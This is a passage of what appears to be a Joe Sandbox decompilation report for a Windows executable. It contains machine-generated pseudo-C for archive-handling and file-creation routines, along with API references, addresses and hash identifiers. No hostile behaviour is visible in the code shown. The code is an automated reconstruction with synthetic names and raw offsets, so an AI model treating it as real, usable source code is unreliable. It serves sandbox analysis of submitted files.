                              										__eflags = _t471;
                              										if(_t471 != 0) {
                              											 *((intOrPtr*)( *_t471 + 8))(_t471);
                              										}
                              										 *(_t678 - 4) = 0x10;
                              										E004042AD(_t678 - 0xa8);
                              										 *(_t678 - 4) = 1;
                              										E004099BC(_t678 - 0xf8, __eflags);
                              										 *(_t678 - 4) =  *(_t678 - 4) & 0x00000000;
                              										DeleteCriticalSection(_t678 - 0x4c);
                              										E00403800(_t678 - 0x50);
                              										 *((intOrPtr*)(_t678 - 0x2c)) = 0x41b6c8;
                              										 *(_t678 - 4) = 0x11;
                              										E004042D6();
                              										_t237 = _t678 - 4;
                              										 *_t237 =  *(_t678 - 4) | 0xffffffff;
                              										__eflags =  *_t237;
                              										E004042AD(_t678 - 0x2c);
                              										goto L81;
                              									}
                              									E0040640D(_t678 - 0x14,  *(_t678 + 8));
                              									__eflags =  *((char*)(_t658 + 0x68));
                              									if(__eflags != 0) {
                              										E0040A0DE( *((intOrPtr*)(_t658 + 0x6c)), _t678, __eflags,  *(_t678 + 8));
                              									}
                              									L43:
                              									_push(_t678 - 0x14);
                              									E0040BAB0(_t658 + 0x78);
                              									_t482 =  *(_t678 - 0x14);
                              									 *(_t678 - 4) = 0xa;
                              									__eflags = _t482;
                              									if(_t482 != 0) {
                              										 *((intOrPtr*)( *_t482 + 8))(_t482);
                              									}
                              									_t483 =  *(_t678 + 8);
                              									 *(_t678 - 4) = 9;
                              									__eflags = _t483;
                              									if(_t483 != 0) {
                              										 *((intOrPtr*)( *_t483 + 8))(_t483);
                              									}
                              									_t484 =  *(_t678 + 0x10);
                              									 *(_t678 - 4) = 5;
                              									__eflags = _t484;
                              									if(_t484 != 0) {
                              										 *((intOrPtr*)( *_t484 + 8))(_t484);
                              									}
                              									 *(_t678 - 0x10) =  *(_t678 - 0x10) + 1;
                              									__eflags =  *(_t678 - 0x10) -  *(_t678 - 0x18);
                              									if(__eflags < 0) {
                              										continue;
                              									} else {
                              										goto L50;
                              									}
                              								}
                              								__eflags =  *((intOrPtr*)(_t676 + 0x18)) - 1;
                              								if( *((intOrPtr*)(_t676 + 0x18)) != 1) {
                              									goto L40;
                              								}
                              								_t626 =  *(_t678 + 0x10);
                              								__eflags = _t626;
                              								if(_t626 == 0) {
                              									_t490 =  *(_t678 + 8);
                              									 *(_t678 - 4) = 9;
                              									__eflags = _t490;
                              									if(_t490 != 0) {
                              										 *((intOrPtr*)( *_t490 + 8))(_t490);
                              										_t626 =  *(_t678 + 0x10);
                              									}
                              									__eflags = _t626;
                              									 *(_t678 - 4) = 5;
                              									if(_t626 != 0) {
                              										 *((intOrPtr*)( *_t626 + 8))(_t626);
                              									}
                              									 *(_t678 - 4) = 0xe;
                              									E004042AD(_t678 - 0xa8);
                              									 *(_t678 - 4) = 1;
                              									E004099BC(_t678 - 0xf8, __eflags);
                              									 *(_t678 - 4) =  *(_t678 - 4) & 0x00000000;
                              									DeleteCriticalSection(_t678 - 0x4c);
                              									E00403800(_t678 - 0x50);
                              									 *((intOrPtr*)(_t678 - 0x2c)) = 0x41b6c8;
                              									 *(_t678 - 4) = 0xf;
                              									_t668 = 0x80004001;
                              									goto L109;
                              								}
                              								E0040640D(_t678 - 0x14, _t626);
                              								__eflags =  *((intOrPtr*)(_t658 + 0x68)) - _t539;
                              								if(__eflags != 0) {
                              									E0040A0B9( *((intOrPtr*)(_t658 + 0x6c)), _t678, __eflags,  *(_t678 + 0x10));
                              								}
                              								goto L43;
                              							}
                              							_t463 =  *(_t678 + 8);
                              							 *(_t678 - 4) = 9;
                              							__eflags = _t463;
                              							if(_t463 != 0) {
                              								 *((intOrPtr*)( *_t463 + 8))(_t463);
                              							}
                              							_t464 =  *(_t678 + 0x10);
                              							 *(_t678 - 4) = 5;
                              							__eflags = _t464;
                              							if(_t464 != 0) {
                              								 *((intOrPtr*)( *_t464 + 8))(_t464);
                              							}
                              							 *(_t678 - 4) = 0xb;
                              							E004042AD(_t678 - 0xa8);
                              							 *(_t678 - 4) = 1;
                              							E004099BC(_t678 - 0xf8, __eflags);
                              							 *(_t678 - 4) =  *(_t678 - 4) & 0x00000000;
                              							DeleteCriticalSection(_t678 - 0x4c);
                              							E00403800(_t678 - 0x50);
                              							 *((intOrPtr*)(_t678 - 0x2c)) = 0x41b6c8;
                              							 *(_t678 - 4) = 0xc;
                              							_t668 = _t539;
                              							goto L109;
                              						} else {
                              							 *(_t678 - 4) = 7;
                              							E004042AD(_t678 - 0xa8);
                              							 *(_t678 - 4) = 1;
                              							E004099BC(_t678 - 0xf8, _t700);
                              							 *(_t678 - 4) =  *(_t678 - 4) & 0x00000000;
                              							DeleteCriticalSection(_t678 - 0x4c);
                              							E00403800(_t678 - 0x50);
                              							 *((intOrPtr*)(_t678 - 0x2c)) = 0x41b6c8;
                              							 *(_t678 - 4) = 8;
                              							L109:
                              							E004042D6();
                              							 *(_t678 - 4) =  *(_t678 - 4) | 0xffffffff;
                              							E004042AD(_t678 - 0x2c);
                              							L113:
                              							_t373 = _t668;
                              							goto L114;
                              						}
                              					}
                              					_t510 = E0040B753(_t678 - 0xf8, _t658 + 4);
                              					asm("sbb al, al");
                              					_t512 =  ~_t510 + 1;
                              					 *((char*)(_t678 + 0xb)) = _t512;
                              					if(_t512 == 0) {
                              						goto L51;
                              					}
                              					goto L21;
                              				} else {
                              					_t540 =  *((intOrPtr*)(_t678 + 0x14));
                              					do {
                              						_push(0x18);
                              						_t513 = E00403A76();
                              						if(_t513 == 0) {
                              							_t662 = 0;
                              							__eflags = 0;
                              						} else {
                              							 *(_t513 + 4) =  *(_t513 + 4) & 0x00000000;
                              							 *_t513 = 0x41b6e8;
                              							_t662 = _t513;
                              						}
                              						 *((intOrPtr*)(_t678 - 0x34)) = _t662;
                              						if(_t662 != 0) {
                              							 *((intOrPtr*)( *_t662 + 4))(_t662);
                              						}
                              						_push(0x28);
                              						 *((intOrPtr*)(_t662 + 8)) = _t678 - 0x50;
                              						 *((intOrPtr*)(_t662 + 0x10)) =  *((intOrPtr*)(_t678 + 0xc));
                              						 *(_t662 + 0x14) =  *(_t678 + 0x10);
                              						 *((intOrPtr*)(_t678 + 0xc)) =  *((intOrPtr*)(_t678 + 0xc)) +  *_t540;
                              						 *(_t678 - 4) = 2;
                              						asm("adc [ebp+0x10], ecx");
                              						_t518 = E00403A76();
                              						if(_t518 == 0) {
                              							_t677 = 0;
                              							__eflags = 0;
                              						} else {
                              							 *(_t518 + 4) =  *(_t518 + 4) & 0x00000000;
                              							 *(_t518 + 8) =  *(_t518 + 8) & 0x00000000;
                              							 *_t518 = 0x41b6d8;
                              							_t677 = _t518;
                              						}
                              						 *(_t678 - 0x18) = _t677;
                              						if(_t677 != 0) {
                              							 *((intOrPtr*)( *_t677 + 4))(_t677);
                              						}
                              						_t34 = _t677 + 8; // 0x8
                              						 *(_t678 - 4) = 3;
                              						E0040640D(_t34, _t662);
                              						 *(_t677 + 0x18) =  *(_t677 + 0x18) & 0x00000000;
                              						 *(_t677 + 0x1c) =  *(_t677 + 0x1c) & 0x00000000;
                              						 *(_t677 + 0x20) =  *(_t677 + 0x20) & 0x00000000;
                              						 *((intOrPtr*)(_t677 + 0x10)) =  *_t540;
                              						 *((intOrPtr*)(_t677 + 0x14)) =  *((intOrPtr*)(_t540 + 4));
                              						_push(_t678 - 0x18);
                              						E0040A5E4(_t678 - 0x2c);
                              						_t523 =  *(_t678 - 0x18);
                              						 *(_t678 - 4) = 2;
                              						if(_t523 != 0) {
                              							 *((intOrPtr*)( *_t523 + 8))(_t523);
                              						}
                              						 *(_t678 - 4) = 1;
                              						if(_t662 != 0) {
                              							 *((intOrPtr*)( *_t662 + 8))(_t662);
                              						}
                              						 *(_t678 + 8) =  *(_t678 + 8) + 1;
                              						_t540 = _t540 + 8;
                              					} while ( *(_t678 + 8) <  *((intOrPtr*)( *(_t678 + 0x18) + 0x30)));
                              					_t658 =  *((intOrPtr*)(_t678 - 0x30));
                              					goto L19;
                              				}
                              			}
                              0x0040ae01
                              0x0040ae0b
                              0x0040ae0f
                              0x0040ae13
                              0x0040ae17
                              0x0040ae1d
                              0x0040ae20
                              0x0040ae24
                              0x0040ae29
                              0x0040ae2c
                              0x0040ae32
                              0x0040ae37
                              0x0040ae37
                              0x0040ae3c
                              0x0040ae40
                              0x0040ae45
                              0x0040ae45
                              0x0040ae48
                              0x0040ae51
                              0x0040ae54
                              0x0040ae5d
                              0x00000000
                              0x0040ae5d

                              APIs
                              • __EH_prolog.LIBCMT ref: 0040AD1E
                                • Part of subcall function 0040D7CC: __EH_prolog.LIBCMT ref: 0040D7D1
                                • Part of subcall function 00413310: InitializeCriticalSection.KERNEL32(?,?,?,00000000,00000000), ref: 0041333E
                              • DeleteCriticalSection.KERNEL32(?), ref: 0040AF52
                              • DeleteCriticalSection.KERNEL32(?), ref: 0040B1DF
                              • DeleteCriticalSection.KERNEL32(?), ref: 0040B24A
                              • DeleteCriticalSection.KERNEL32(?), ref: 0040B2A7
                              • DeleteCriticalSection.KERNEL32(?), ref: 0040B3B6
                              • DeleteCriticalSection.KERNEL32(?), ref: 0040B410
                              • DeleteCriticalSection.KERNEL32(?,?,?,00000004,00000004), ref: 0040B485
                              • DeleteCriticalSection.KERNEL32(?), ref: 0040B517
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: CriticalSection$Delete$H_prolog$Initialize
                              • String ID:
                              • API String ID: 3452124646-0
                              • Opcode ID: 5f6b8a8cdbdc89edeaeca9fb6a48680f4fe42b6689f54ac84f6a401f85157967
                              • Instruction ID: 06aa0bffc57edc8446930be4fb3d3ecc4288fdccd94c57135405988f21593cb0
                              • Opcode Fuzzy Hash: 5f6b8a8cdbdc89edeaeca9fb6a48680f4fe42b6689f54ac84f6a401f85157967
                              • Instruction Fuzzy Hash: 5D625E7090024ADFDB14DFA4C944BDDBBB4EF14308F1480AEE815B72D2DB789A49DB99
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              C-Code - Quality: 80%
                              			E004059B3(void** __ecx) {
                              				signed int _t23;
                              				void* _t24;
                              				signed int _t26;
                              				intOrPtr* _t29;
                              				signed int _t31;
                              				void** _t50;
                              				void* _t52;
                              				intOrPtr _t57;
                              
                              				E00413954(E00419734, _t52);
                              				_t57 =  *0x423148; // 0x1
                              				_t50 = __ecx;
                              				if(_t57 != 0) {
                              					_t23 = E00405A63(__ecx);
                              					__eflags = _t23;
                              					if(_t23 != 0) {
                              						_t14 = _t52 + 0x14; // 0x414be4
                              						_t24 = CreateFileW( *(_t52 + 8),  *(_t52 + 0xc),  *(_t52 + 0x10), 0,  *_t14,  *(_t52 + 0x18), 0); // executed
                              						__eflags = _t24 - 0xffffffff;
                              						_t19 = _t24 != 0xffffffff;
                              						__eflags = _t19;
                              						 *_t50 = _t24;
                              						_t23 = 0 | _t19;
                              					}
                              				} else {
                              					E00401C80(_t52 - 0x18,  *(_t52 + 8));
                              					 *((intOrPtr*)(_t52 - 4)) = 0;
                              					_t26 = AreFileApisANSI();
                              					asm("sbb eax, eax");
                              					_push( ~_t26 + 1);
                              					_t29 = E00403D04(_t52 - 0x24);
                              					 *((char*)(_t52 - 4)) = 1;
                              					_t8 = _t52 + 0x14; // 0x414be4
                              					_t31 = E0040597A(_t50, _t57,  *_t29,  *(_t52 + 0xc),  *(_t52 + 0x10),  *_t8,  *(_t52 + 0x18));
                              					E00403A9C( *((intOrPtr*)(_t52 - 0x24)));
                              					E00403A9C( *((intOrPtr*)(_t52 - 0x18)));
                              					_t23 = _t31;
                              				}
                              				 *[fs:0x0] =  *((intOrPtr*)(_t52 - 0xc));
                              				return _t23;
                              			}


                              APIs
                              • __EH_prolog.LIBCMT ref: 004059B8
                              • AreFileApisANSI.KERNEL32(?,?,00000000,00000003,?,00000000,?,00000000), ref: 004059DC
                                • Part of subcall function 0040597A: CreateFileA.KERNEL32(?,00000001,?,00000000,?,?,00000000,?,KA,00405A0D,?,?,?,KA,?,00000001), ref: 0040599C
                              • CreateFileW.KERNELBASE(?,?,?,00000000,KA,?,00000000,?,00000000,00000003,?,00000000,?,00000000), ref: 00405A41
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: File$Create$ApisH_prolog
                              • String ID: KA
                              • API String ID: 1948390111-4133974868
                              • Opcode ID: f88b55b959810e929b2353b4b1d1eb61229a220c48e216d77a80ee84dd8b33a8
                              • Instruction ID: 6ceee1153368ae3910bf8b124445a1a72b78f4c7609cf7ab69cd6f34e54ac91e
                              • Opcode Fuzzy Hash: f88b55b959810e929b2353b4b1d1eb61229a220c48e216d77a80ee84dd8b33a8
                              • Instruction Fuzzy Hash: E0118E72A00109EFCF01AFA4D8818DE7F76EF08318F10412AF512B21A1CB398A65DF94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              C-Code - Quality: 100%
                              			E0040483F(WCHAR* __ecx, FILETIME* __edx, FILETIME* _a4, FILETIME* _a8) {
                              				void* _t5;
                              				int _t7;
                              				signed int _t10;
                              				FILETIME* _t13;
                              				void* _t15;
                              				void* _t17;
                              
                              				_t10 = 0;
                              				_t17 =  *0x423148 - _t10; // 0x1
                              				_t13 = __edx;
                              				if(_t17 != 0) {
                              					_t5 = CreateFileW(__ecx, 0x40000000, 3, 0, 3, 0x2000000, 0); // executed
                              					_t15 = _t5;
                              					if(_t15 != 0xffffffff) {
                              						_t7 = SetFileTime(_t15, _t13, _a4, _a8); // executed
                              						_t10 = 0 | _t7 != 0x00000000;
                              						CloseHandle(_t15);
                              					}
                              					return _t10;
                              				}
                              				SetLastError(0x78);
                              				return 0;
                              			}


                              APIs
                              • SetLastError.KERNEL32(00000078,0041B370,00000000,00402AAF,00000000,?,?,?,?), ref: 0040484F
                              • CreateFileW.KERNELBASE(?,40000000,00000003,00000000,00000003,02000000,00000000,?,0041B370,00000000,00402AAF,00000000,?,?,?,?), ref: 0040486B
                              • SetFileTime.KERNELBASE(00000000,00000000,?,?,?,40000000,00000003,00000000,00000003,02000000,00000000,?,0041B370,00000000,00402AAF,00000000), ref: 00404882
                              • CloseHandle.KERNEL32(00000000,?,40000000,00000003,00000000,00000003,02000000,00000000,?,0041B370,00000000,00402AAF,00000000,?,?,?), ref: 0040488E
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: File$CloseCreateErrorHandleLastTime
                              • String ID:
                              • API String ID: 2291555494-0
                              • Opcode ID: ff746e65f9cee30ffc8bafec341a8eb05b102094c88bf525f6141f2248b114e2
                              • Instruction ID: 64467d0e5ceda328e6e32eae128236dd02d513a4ef1926b956b8d25c0d97de23
                              • Opcode Fuzzy Hash: ff746e65f9cee30ffc8bafec341a8eb05b102094c88bf525f6141f2248b114e2
                              • Instruction Fuzzy Hash: B4F0E2762803507BE2302B60AC48F9B6E5CDBC9B25F108535B2A5A20E0C2294D1992B8
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              C-Code - Quality: 95%
                              			E00408524(intOrPtr* __ecx) {
                              				intOrPtr* _t153;
                              				signed int _t157;
                              				intOrPtr _t162;
                              				signed int _t163;
                              				signed int _t165;
                              				signed int _t169;
                              				signed int _t171;
                              				signed int _t172;
                              				signed int _t178;
                              				signed int _t179;
                              				signed int _t185;
                              				void* _t187;
                              				signed int _t190;
                              				void* _t196;
                              				char* _t201;
                              				signed int _t203;
                              				signed int _t205;
                              				intOrPtr _t210;
                              				signed int _t220;
                              				signed int _t222;
                              				void* _t225;
                              				signed int _t231;
                              				intOrPtr _t257;
                              				intOrPtr _t278;
                              				signed int* _t289;
                              				signed int _t292;
                              				intOrPtr _t293;
                              				intOrPtr _t295;
                              				void* _t297;
                              
                              				E00413954(E00419AE4, _t297);
                              				_t289 = __ecx;
                              				_t292 = 0;
                              				_t153 =  *((intOrPtr*)(__ecx));
                              				if(_t153 != 0) {
                              					 *((intOrPtr*)( *_t153 + 8))(_t153);
                              					 *((intOrPtr*)(__ecx)) = 0;
                              				}
                              				 *(_t289 + 0x34) = _t292;
                              				 *( *(_t289 + 0x30)) = _t292;
                              				E0040455D(_t289 + 4);
                              				 *(_t297 - 4) = _t292;
                              				 *(_t297 - 0x20) = _t292;
                              				 *(_t297 - 0x1c) = _t292;
                              				 *(_t297 - 0x18) = _t292;
                              				E00402170(_t297 - 0x20, 3);
                              				_t157 =  *(_t297 - 0x28);
                              				 *(_t297 - 4) = 1;
                              				if(_t157 == _t292) {
                              					L11:
                              					E004032A8(_t297 - 0x68, 4);
                              					 *((intOrPtr*)(_t297 - 0x68)) = 0x41b378;
                              					__eflags =  *(_t297 + 0xc) - _t292;
                              					 *(_t297 - 4) = 3;
                              					if( *(_t297 + 0xc) < _t292) {
                              						_t231 =  *(_t297 + 8);
                              						 *(_t297 + 0xc) = _t292;
                              						__eflags =  *(_t231 + 0x10);
                              						if( *(_t231 + 0x10) <= 0) {
                              							L18:
                              							__eflags =  *(_t297 + 0x10);
                              							if( *(_t297 + 0x10) != 0) {
                              								L22:
                              								_t292 = 0;
                              								__eflags = 0;
                              								L23:
                              								__eflags =  *((intOrPtr*)(_t297 - 0x60)) - _t292;
                              								 *(_t297 + 0xc) = _t292;
                              								if( *((intOrPtr*)(_t297 - 0x60)) <= _t292) {
                              									L37:
                              									_t293 = 1;
                              									L38:
                              									 *(_t297 - 4) = 1;
                              									E004042AD(_t297 - 0x68);
                              									E00403A9C( *(_t297 - 0x20));
                              									E00403A9C( *((intOrPtr*)(_t297 - 0x2c)));
                              									_t162 = _t293;
                              									L39:
                              									 *[fs:0x0] =  *((intOrPtr*)(_t297 - 0xc));
                              									return _t162;
                              								} else {
                              									goto L24;
                              								}
                              								do {
                              									L24:
                              									_t163 =  *(_t297 + 0x10);
                              									__eflags = _t163 - _t292;
                              									if(_t163 == _t292) {
                              										L26:
                              										 *(_t297 + 8) = _t292;
                              										 *(_t297 - 4) = 4;
                              										_t165 =  *( *((intOrPtr*)(_t297 - 0x5c)) +  *(_t297 + 0xc) * 4);
                              										 *(_t289 + 0x1c) = _t165;
                              										E0040640D(_t297 + 8,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t231 + 0x14)) + _t165 * 4)) + 4))());
                              										_t169 =  *(_t297 + 8);
                              										__eflags = _t169 - _t292;
                              										if(_t169 != _t292) {
                              											__eflags =  *(_t297 + 0x10) - _t292;
                              											if( *(_t297 + 0x10) == _t292) {
                              												 *(_t297 - 0x14) = _t292;
                              												 *(_t297 - 4) = 5;
                              												 *((intOrPtr*)( *_t169))(_t169, 0x41b1f8, _t297 - 0x14);
                              												_t171 =  *(_t297 - 0x14);
                              												__eflags = _t171 - _t292;
                              												if(_t171 == _t292) {
                              													_t172 =  *(_t297 + 8);
                              													 *(_t297 - 4) = 3;
                              													__eflags = _t172 - _t292;
                              													if(_t172 != _t292) {
                              														 *((intOrPtr*)( *_t172 + 8))(_t172);
                              													}
                              													 *(_t297 - 4) = 1;
                              													E004042AD(_t297 - 0x68);
                              													E00403A9C( *(_t297 - 0x20));
                              													E00403A9C( *((intOrPtr*)(_t297 - 0x2c)));
                              													_t162 = 0x80004001;
                              													goto L39;
                              												}
                              												 *((intOrPtr*)(_t297 - 0x10)) =  *((intOrPtr*)( *_t171 + 0xc))(_t171,  *((intOrPtr*)(_t297 + 0x14)));
                              												_t178 =  *(_t297 - 0x14);
                              												__eflags = _t178 - _t292;
                              												 *(_t297 - 4) = 4;
                              												if(_t178 != _t292) {
                              													 *((intOrPtr*)( *_t178 + 8))(_t178);
                              												}
                              												L33:
                              												__eflags =  *((intOrPtr*)(_t297 - 0x10)) - 1;
                              												if( *((intOrPtr*)(_t297 - 0x10)) != 1) {
                              													__eflags =  *((intOrPtr*)(_t297 - 0x10)) - _t292;
                              													if( *((intOrPtr*)(_t297 - 0x10)) == _t292) {
                              														 *(_t297 - 0x54) = _t292;
                              														 *(_t297 - 0x52) = _t292;
                              														_t179 =  *(_t297 + 8);
                              														 *(_t297 - 4) = 6;
                              														 *((intOrPtr*)( *_t179 + 0x20))(_t179, 0x37, _t297 - 0x54);
                              														__eflags =  *(_t297 - 0x54) - _t292;
                              														if( *(_t297 - 0x54) != _t292) {
                              															__eflags =  *(_t297 - 0x54) - 8;
                              															_t201 =  *(_t297 - 0x4c);
                              															if( *(_t297 - 0x54) != 8) {
                              																_t201 = L"Unknown error";
                              															}
                              															E00401D1B(_t289 + 0x30, _t201);
                              														}
                              														 *(_t297 - 4) = 4;
                              														E00405E34(_t297 - 0x54);
                              														E0040640D(_t289,  *(_t297 + 8));
                              														_t295 =  *((intOrPtr*)( *((intOrPtr*)(_t231 + 0x14)) +  *(_t289 + 0x1c) * 4));
                              														__eflags =  *(_t295 + 0x20);
                              														if( *(_t295 + 0x20) != 0) {
                              															_t185 = E004088CE(_t295, _t297 - 0x20);
                              															__eflags = _t185;
                              															if(_t185 < 0) {
                              																_t185 = 0;
                              																__eflags = 0;
                              															}
                              															_t257 =  *((intOrPtr*)(_t295 + 0x24));
                              															_t143 =  *((intOrPtr*)(_t257 + _t185 * 4)) + 0xc; // 0xc
                              															_push( *((intOrPtr*)(_t257 + _t185 * 4)));
                              															_t187 = E00407D82(_t297 - 0x50, _t297 - 0x2c);
                              															 *(_t297 - 4) = 0xa;
                              															E00401D7A(_t289 + 0x10, _t187);
                              															E00403A9C( *((intOrPtr*)(_t297 - 0x50)));
                              														} else {
                              															E00401C80(_t297 - 0x44, 0x423338);
                              															 *(_t297 - 4) = 7;
                              															E00401C80(_t297 - 0x38, 0x423338);
                              															_push(_t297 - 0x44);
                              															_push(_t297 - 0x38);
                              															 *(_t297 - 4) = 8;
                              															_t196 = E00407D82(_t297 - 0x50, _t297 - 0x2c);
                              															 *(_t297 - 4) = 9;
                              															E00401D7A(_t289 + 0x10, _t196);
                              															E00403A9C( *((intOrPtr*)(_t297 - 0x50)));
                              															E00403A9C( *((intOrPtr*)(_t297 - 0x38)));
                              															E00403A9C( *((intOrPtr*)(_t297 - 0x44)));
                              														}
                              														_t190 =  *(_t297 + 8);
                              														 *(_t297 - 4) = 3;
                              														__eflags = _t190;
                              														if(_t190 != 0) {
                              															 *((intOrPtr*)( *_t190 + 8))(_t190);
                              														}
                              														_t293 = 0;
                              													} else {
                              														_t203 =  *(_t297 + 8);
                              														 *(_t297 - 4) = 3;
                              														__eflags = _t203 - _t292;
                              														if(_t203 != _t292) {
                              															 *((intOrPtr*)( *_t203 + 8))(_t203);
                              														}
                              														_t293 =  *((intOrPtr*)(_t297 - 0x10));
                              													}
                              													goto L38;
                              												}
                              												_t205 =  *(_t297 + 8);
                              												 *(_t297 - 4) = 3;
                              												__eflags = _t205 - _t292;
                              												if(_t205 != _t292) {
                              													 *((intOrPtr*)( *_t205 + 8))(_t205);
                              												}
                              												goto L36;
                              											}
                              											 *((intOrPtr*)(_t297 - 0x10)) =  *((intOrPtr*)( *_t169 + 0xc))(_t169,  *(_t297 + 0x10), 0x41b5f8,  *((intOrPtr*)(_t297 + 0x18)));
                              											goto L33;
                              										}
                              										 *(_t297 - 4) = 3;
                              										goto L36;
                              									}
                              									_t210 =  *((intOrPtr*)( *_t163 + 0x10))(_t163, _t292, _t292, _t292, _t292);
                              									__eflags = _t210 - _t292;
                              									if(_t210 != _t292) {
                              										_t293 = _t210;
                              										goto L38;
                              									}
                              									goto L26;
                              									L36:
                              									 *(_t297 + 0xc) =  *(_t297 + 0xc) + 1;
                              									__eflags =  *(_t297 + 0xc) -  *((intOrPtr*)(_t297 - 0x60));
                              								} while ( *(_t297 + 0xc) <  *((intOrPtr*)(_t297 - 0x60)));
                              								goto L37;
                              							}
                              							__eflags =  *(_t297 + 0xc) - 1;
                              							if( *(_t297 + 0xc) == 1) {
                              								E004042EB(_t297 - 0x68, 1);
                              								goto L22;
                              							}
                              							_t293 = 0x80004001;
                              							goto L38;
                              						} else {
                              							goto L14;
                              						}
                              						do {
                              							L14:
                              							__eflags = E004088CE( *((intOrPtr*)( *((intOrPtr*)(_t231 + 0x14)) + _t292 * 4)), _t297 - 0x20);
                              							if(__eflags < 0) {
                              								E004039DF(_t297 - 0x68, _t292);
                              							} else {
                              								 *(_t297 + 0xc) =  *(_t297 + 0xc) + 1;
                              								E00404407(_t297 - 0x68, __eflags,  *(_t297 + 0xc));
                              								 *(( *(_t297 + 0xc) << 2) +  *((intOrPtr*)(_t297 - 0x5c))) = _t292;
                              								_t231 =  *(_t297 + 8);
                              							}
                              							_t292 = _t292 + 1;
                              							__eflags = _t292 -  *(_t231 + 0x10);
                              						} while (_t292 <  *(_t231 + 0x10));
                              						goto L18;
                              					}
                              					E004039DF(_t297 - 0x68,  *(_t297 + 0xc));
                              					_t231 =  *(_t297 + 8);
                              					goto L23;
                              				} else {
                              					_t278 =  *((intOrPtr*)(_t297 - 0x2c));
                              					_t220 = _t278 + _t157 * 2 - 2;
                              					while( *_t220 != 0x2e) {
                              						if(_t220 == _t278) {
                              							_t222 = _t220 | 0xffffffff;
                              							__eflags = _t222;
                              							L9:
                              							__eflags = _t222 - _t292;
                              							if(_t222 >= _t292) {
                              								__eflags = _t222 + 1;
                              								_t225 = E00401E19(_t297 - 0x2c, _t297 - 0x44, _t222 + 1);
                              								 *(_t297 - 4) = 2;
                              								E00401D7A(_t297 - 0x20, _t225);
                              								 *(_t297 - 4) = 1;
                              								E00403A9C( *((intOrPtr*)(_t297 - 0x44)));
                              							}
                              							goto L11;
                              						} else {
                              							_t220 = _t220;
                              							continue;
                              						}
                              					}
                              					_t222 = _t220 - _t278 >> 1;
                              					goto L9;
                              				}
                              			}

                              0x00408529
                              0x00408534
                              0x00408536
                              0x00408538
                              0x0040853c
                              0x00408541
                              0x00408544
                              0x00408544
                              0x00408549
                              0x00408552
                              0x00408555
                              0x0040855f
                              0x00408562
                              0x00408565
                              0x00408568
                              0x0040856b
                              0x00408570
                              0x00408573
                              0x00408579
                              0x004085c5
                              0x004085ca
                              0x004085cf
                              0x004085d6
                              0x004085d9
                              0x004085dd
                              0x004085ef
                              0x004085f2
                              0x004085f5
                              0x004085f9
                              0x0040863c
                              0x0040863c
                              0x00408640
                              0x0040865c
                              0x0040865c
                              0x0040865c
                              0x0040865e
                              0x0040865e
                              0x00408661
                              0x00408664
                              0x00408733
                              0x00408735
                              0x00408736
                              0x00408739
                              0x0040873d
                              0x00408745
                              0x0040874d
                              0x00408753
                              0x00408756
                              0x0040875c
                              0x00408764
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040866a
                              0x0040866a
                              0x0040866a
                              0x0040866d
                              0x0040866f
                              0x00408683
                              0x00408683
                              0x0040868c
                              0x00408690
                              0x00408693
                              0x004086a3
                              0x004086a8
                              0x004086ab
                              0x004086ad
                              0x004086b5
                              0x004086b8
                              0x004086d0
                              0x004086df
                              0x004086e3
                              0x004086e5
                              0x004086e8
                              0x004086ea
                              0x0040876b
                              0x0040876e
                              0x00408772
                              0x00408774
                              0x00408779
                              0x00408779
                              0x0040877f
                              0x00408783
                              0x0040878b
                              0x00408793
                              0x00408799
                              0x00000000
                              0x0040879e
                              0x004086f5
                              0x004086f8
                              0x004086fb
                              0x004086fd
                              0x00408701
                              0x00408706
                              0x00408706
                              0x00408709
                              0x00408709
                              0x0040870d
                              0x004087a1
                              0x004087a4
                              0x004087bf
                              0x004087c3
                              0x004087c7
                              0x004087d3
                              0x004087d7
                              0x004087da
                              0x004087de
                              0x004087e0
                              0x004087e5
